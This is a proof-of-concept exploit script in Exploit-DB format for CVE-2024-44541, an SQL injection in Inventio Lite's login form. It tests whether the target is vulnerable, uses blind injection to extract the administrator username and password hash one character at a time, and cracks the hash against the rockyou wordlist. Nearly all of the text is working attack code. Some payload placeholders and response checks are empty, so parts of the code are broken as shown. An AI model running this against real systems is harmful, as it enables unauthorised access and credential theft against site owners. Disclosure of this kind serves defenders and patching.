# Exploit Title: Inventio Lite 4 - SQL Injection Error Based SQLi in "username" parameter on "/?action=processlogin." # Date: 08/21/2024 # Exploit Author: pointedsec # Vendor Homepage: http://evilnapsis.com # Software Link: https://github.com/evilnapsis/inventio-lite # Version: < 4 # Tested on: Linux, Windows # CVE : CVE-2024-44541 # This scripts exploit this vulnerability, extracting the hashes from database and tries to decrypt it. # The passwords are hashed like this: $pass = sha1(md5($_POST['password'])); import requests import signal from pwn import * BASE_URL = "http://192.168.1.51/inventio-lite/" PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt" LOGIN_ACTION = BASE_URL + "?action=processlogin" # Handling Ctrl + C def def_handler(x,y): log.failure("Quitting...") exit(1) signal.signal(signal.SIGINT, def_handler) def is_vulnerable(): log.info("Checking if target is vulnerable") payload = { "username": "\") \"", "password": "\") \"" } r = requests.post(LOGIN_ACTION, data=payload) if (r.status_code != 200 or "Uncaught mysqli_sql_exception" in r.text): return True else: return False def get_administrator_hash(username): prog_hash = log.progress("Extracting Admin Password Hash") replace_payload = "\") or username LIKE '' or email LIKE '' and password LIKE '%' and is_admin=1 LIMIT 1-- -".replace("", username) characters = "abcdefghijklmnopqrstuvwxyz0123456789" # SHA(MD5(PASSWORD)) so there are no symbols and no uppercases admin_hash = "" while True: found_char = False for char in characters: payload = { "username": replace_payload.replace("", admin_hash + char), "password": "blablablbalbablalba123@" } try: r = requests.post(LOGIN_ACTION, data=payload) r.raise_for_status() except requests.RequestException as e: log.error(f"Request failed: {e}") continue if "" in r.text: admin_hash += char prog_hash.status("-> %s" % admin_hash) found_char = True break if not found_char: break prog_hash.status("Final Admin Hash: %s" % admin_hash) return admin_hash def get_administrator_username(): prog_username = log.progress("Extracting Username") replace_payload = "\") or username like '%' or email like '%' and is_admin=1 LIMIT 1-- -" characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@." username = "" while True: found_char = False for char in characters: payload = { "username": replace_payload.replace("", username + char), "password": "blablablablbalbla123@" } r = requests.post(LOGIN_ACTION, data=payload) if "" in r.text: username += char prog_username.status("-> %s" % username) found_char = True break if not found_char: break return username def decrypt_password(admin_hash): # Encryption is SHA1(MD5(PWD)) with open(PWD_DIC_PATH) as password_file: for password in password_file: password = password.strip() md5_hash = hashlib.md5(password.encode()).hexdigest() sha1_hash = hashlib.sha1(md5_hash.encode()).hexdigest() if sha1_hash == admin_hash: return password log.error("Password not found in the dictionary.") return None if __name__ == "__main__": # Check if target is vulnerable if not is_vulnerable(): log.failure("Target not Vulnerable...") exit(1) log.success("Target Vulnerable!") log.info("Dumping Administrator username...") admin_username = get_administrator_username() admin_hash = get_administrator_hash(admin_username) pwd = decrypt_password(admin_hash) log.success(f"Password Decrypted! -> {admin_username}:{pwd}") log.info("Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations")